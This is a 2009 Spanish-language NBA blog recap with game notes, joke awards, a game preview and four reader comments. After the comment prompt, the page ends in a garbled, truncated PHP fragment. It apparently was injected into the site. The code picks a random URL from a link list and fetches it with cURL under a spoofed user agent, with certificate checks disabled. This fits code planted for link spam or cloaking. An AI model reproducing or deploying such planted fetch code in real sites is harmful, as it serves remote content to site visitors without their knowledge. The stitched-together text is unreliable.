La crónica (06/02/2009)

07 de February de 2009 por Viva_Dirk

By Viva&Deer&Jabho

Visitaron los “Verdes” el Madison y ninguno de ellos se destapó con bestialidades como las últimas vividas. Ni falta que les hace. La victoria suma igual metas 60 o 15 puntos como Garnett ayer. Más aún cuando Orlando, uno de tus rivales directos, se vió sorprendido en Indiana y los otros dos aspirantes se sacarán los ojos mañana. A los Knicks les ha tocado escalar el Kilimanjaro esta semana, recibiendo los tres ogros. A pesar de todo la pinta es bien distinta que antaño y sólo cedieron en el último cuarto contra los campeones.

Mientras, los Hawks se las vieron y se las desearon para ganar a unos peleones Bobcats. Eso sí, sin Joe Johnson y con un todavía renqueante Horford.

En el Oeste hubo jornada importante pro-playoffs porque jugaron la gran mayoría de los aspirantes. Ganaron todos menos los Blazers que se dieron un batacazo brutal en Oklahoma, que ya no es tan plaza turística como lo era al principio. Sergio estuvo correcto pero sólo Roy, Outlaw y Aldridge hicieron algo en ataque. La defensa, por lo visto, se la dejaron en casa.

Los Suns se vengaron de los Warriors con lucimiento incluido de Nash, Hill y Richardson, con la falta que les hace. Nuggets, Hornets y Jazz hicieron lo propio con Wizards, Raptors y Kings respectivamente, sin despeinarse demasiado (bueno, un poco los Jazz).

Por último, partido en la cumbre de los Ositos contra Clippers demostrándose que ya no son capaces de ganar ni al equipo de mi pueblo.

Ayer además retiraron en Sacramento la camiseta de un grande: Chris Webber. Él y sus Kings nos regalaron grandes años de baloncesto que merecieron mejor suerte. Sin el recuerdo en la historia que dan los títulos si tendrán, sin duda, el de muchos aficionados que disfrutamos con ellos.

PREMIOS

MVP: Uno de los jugadores mas polémicos y que mas críticas reciben se lleva nuestro premio. Zach Randolph cerró la victoria de los Clippers frente a los Grizzlies con 35 puntos, 10 rebotes y 3 asistencias. Detrás quedan las actuaciones de Deron Williams, Carmelo Anthony, Danny Granger, Kevin Durant, Marvin Williams, Pedja Stojakovic y Ray Allen.

Rookie: Ante los decepcionantes partidos de Marc, Rudy, Oden, Mayo y Westbrook, el premio tiene como aspirantes a los no habituales: Hibbert sigue a los suyo con 10 puntos en 16 minutos, McGee anotó 13 en 20 minutos y Jason Thompson cuajó un partido muy completo (17-7-3). De entre todos, el premio va para los 23 puntos y 4 asistencias de Eric Gordon.

Sorpresa: Si Nick Collison mostrase un nivel similar al de ayer los Thunder tendrian muchos problemas solucionados pero como no es habitual se lleva el premio con 21 puntos y 13 rebotes. Un motivo para la esperanza son los 17 puntos de JJ Redick. Confiamos en ti, chaval.

Decepción: Ya le hemos nombrado, pero ante el poderoso juego interior de Oklahoma, Greg Oden se quedó en unos pobres 4 puntos, 2 rebotes, 2 asistencias, 2 pérdidas y 4 faltas en 16 minutos. El premio, no obstante, para una de las sorpresas mas agradables de lo que llevamos de temporada, Paul Millsap, que contra Sacramento anotó 2 tristes puntos en 30 minutos.

Mayor esfuerzo en Vano: Los Magic cayeron frente a los Pacers, pero Turkoglu&Howard lucharon lo indecible. Entre ambos 41 puntos, 26 rebotes y 11 asistencias. Otros aspirantes son David Lee, Okafor, Jamison y Kevin Martin. Sin embargo el premio recae sin discusión en Brandon Roy que lideró a Portland en puntos (32), rebotes (9) y asistencias(6).

RAZONES PARA TRASNOCHAR

No nos espera esta noche de sábado una jornada apasionante en cuanto partidos y habrá que esperar a la jornada del domingo para poder ver partidos entre los 4 máximos aspirantes al anillo. De todos modos para esta noche destacamos el relativamente interesante…

Nuggets@Nets: Ambos equipos vienen con buenas rachas ganadoras, bases All Stars, aleros que pudieron serlo y pívots que están cuajando buenas campañas. Los Nets, tras un buen inicio y un bache posterior, son 9º del Este pero con los Play Offs a tiro. Los Nuggets están haciendo su mejor campaña. Se han consolidado como 3º del Oeste y este año, por fin, apuntan a aspirantes a pasar una ronda de Play Offs y quién sabe a que más… Destacamos además el duelo NenêLopez que vienen jugando muy bien en general todo el año y en especial los últimos partidos.

Nuestro jugador a seguir es… Carmelo Anthony, que además nos ayuda en la pregunta del día. ¿Por qué Melo no es All Star? ¿No lo merece más que West, por ejemplo? ¿Que pensará cuando está jugando más comedido, haciendo más y mejor lo que el equipo necesita y se olvidan de él? Yo personalmente prefiero a este Carmelo, supongo que él también, que al de años atrás cuando si iba al All Star pero a ninguna otra parte. Este año parece que el equipo, y él, podrán dejar una imagen muy diferente a la penosa que dejaron en su serie contra los Lakers en los últimos Play Offs. En el fondo las grandes carreras se forjan en primavera mucho más que en el fin de semana de las estrellas. Aun así, merecía All Star, creo.

Comenta

4 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Como que el equipo de mi pueblo???? Deer creo k tenemos que llevarte el cuarto oscuro o eres del pueblo de san antonio??

    Grande esos kings que nos enamoraron a seguir la nba¡¡¡

      Citar

  2. TheDeerHunter dice:
    #2

    Que susceptibles estáis los angelinos pobres…

      Citar

  3. Txusma dice:
    #3

    La inclusión de West me parece injusta pero antes que Carmelo creo que me llevaría a Al Jefferson. Billups ya completa la cuota de Denver en el All-Stars

      Citar

  4. parra dice:
    #4

    Aquí otro que se aficionó a la nba gracias a esos Kings, la dupla webber-williams me enganchó para la causa.Grandes Kings!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>